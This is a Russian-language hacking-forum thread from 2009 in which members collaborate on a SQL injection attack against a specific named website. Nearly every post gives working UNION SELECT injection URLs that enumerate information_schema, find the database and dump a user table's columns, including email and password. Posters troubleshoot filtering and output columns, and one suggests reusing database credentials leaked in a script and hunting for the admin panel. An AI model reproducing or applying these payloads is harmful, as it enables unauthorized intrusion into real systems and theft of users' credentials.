17.08.2009, 19:04
|
|
Познающий
Регистрация: 11.09.2008
Сообщений: 99
Провел на форуме:
2753780
Репутация:
585
|
|
mailbrush
Там, в index.cgi, есть инфа для коннекта к БД, причем возможно удаленно приконнектиться. Попробуй это проработать + поискать админку.
|
|
|
18.08.2009, 01:50
|
|
Новичок
Регистрация: 19.07.2009
Сообщений: 17
Провел на форуме:
134119
Репутация:
2
|
|
Привет. Вот такой запрос выполняется:
http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,column_name,11, 12,13+from+information_schema.columns+where+table_ name=char%28100,117,98,119,105,107,105,95,117,115, 101,114%29+limit+1,1/*
А так, почему то ошибка, наверно что-то фильтруется:
http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,name,10,11,12,13+ from+dubwiki_user/*
|
|
|
|
18.08.2009, 02:20
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от crawen_s
Привет. Вот такой запрос выполняется:
А так, почему то ошибка, наверно что-то фильтруется:
А тогда в 101 раз скажу - для начала вот так:
Код:
http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,table_schema,10,11,12,13+from+information_schema.columns+where+table_name=0x64756277696b695f75736572/*
допустим выдаст нечто вроде subco_db
потом так:
Код:
http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,name,10,11,12,13+from+subco_db.dubwiki_user/*
|
|
|
|
18.08.2009, 02:22
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
В той таблице нету записей
http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,10,11,(select+c ount(*)+from+dubwiki_user),13+from+information_sch ema.tables--+
|
|
|
|
18.08.2009, 02:22
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
crawen_s
http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,column_name,11, 12,13+from+information_schema.columns+where+table_ name=0x64756277696B695F75736572+limit+1,7/*
id
name
email
password
homepage
creationts
А вообще:
Может быть другая DB. Как проверять написал Pashkela
В данной таблице нету записей
...WHERE TABLE_NAME=<hex>
Последний раз редактировалось Tigger; 18.08.2009 в 02:25..
|
|
|
|
18.08.2009, 02:30
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
...
))) не в то поле смотрел  )) Пора баиньки
Вообще бред какой-то:
Код:
http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,count(*),11,12,13+from+dubwiki_user--+
вот так должен выводить ноль, если записей нет, ошибки нет, но просто пусто, великолепно. Хз чо такое
А вот с этой таблы выводит:
Код:
http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,count(*),11,12,13+from+dubwiki_version--+
и показывает кол-во 7. У меня вывод только один - покрашенная табла в БД, а именно dubwiki_user, т.е. сломанная, нарушенны какие-то связи и т.д. Других вариантов не вижу чото.
Старшие придут, может чо поумнее скажут
PS: Ну да, остальные dubwiki в той же БД:
Код:
http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,table_schema,11,12,13+from+information_schema.columns+where+table_name=0x64756277696b695f70616765--+
но из них инфо спокойно читается, на тоже как-то странно )
Код:
http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,concat_ws(id,name,currentversion),11,12,13+from+dubwiki_page+limit+1,1--+
какой-то мегохоцер БД строил
Последний раз редактировалось Pashkela; 18.08.2009 в 02:55..
|
|
|
|
18.08.2009, 04:06
|
|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055
Репутация:
347
|
|
Сообщение от Pashkela
... У меня вывод только один - покрашенная табла в БД, а именно dubwiki_user, т.е. сломанная, нарушенны какие-то связи и т.д. Других вариантов не вижу чото.
Старшие придут, может чо поумнее скажут
..
а вы как бы не предполагали что вы не туда выводите результат запроса? Просто в коде для 10-ого поля стоит проверка, если 0 то ничего не выводится вообще. А если выводить например в 12-ое поле то отлично видно что в той табличке просто ничего нет
Код:
http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,10,11,count(*),13+from+dubwiki_user--+
|
|
|
|
18.08.2009, 13:02
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Сообщение от Pashkela
...
Код:
http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,concat_ws(id,name,currentversion),11,12,13+from+dubwiki_page+limit+1,1--+
какой-то мегохоцер БД строил Какой то мегохоцер не умеет юзать concat_ws
|
|
|
|
18.08.2009, 13:18
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468
Репутация:
1224
|
|
Сообщение от Pashkela
Код:
http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,concat_ws(id,name,currentversion),11,12,13+from+dubwiki_page+limit+1,1--+
какой-то мегохоцер БД строил concat_ws(0x3a,column,column) мегохоцер 
|
|
|
|
18.08.2009, 05:50
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
^
||
Вот именно
Код:
http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,0x30,11,12,13+--+
какие тут связи нарушены могут быть? нейронные? во что покрашена табла? в какой цвет? и собственно какая табла? в последнем примере ничего странного не обнаружил, мож ты просто в concat_ws разделитель забыл поставить?
__________________
Карфаген должен быть разрушен...
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
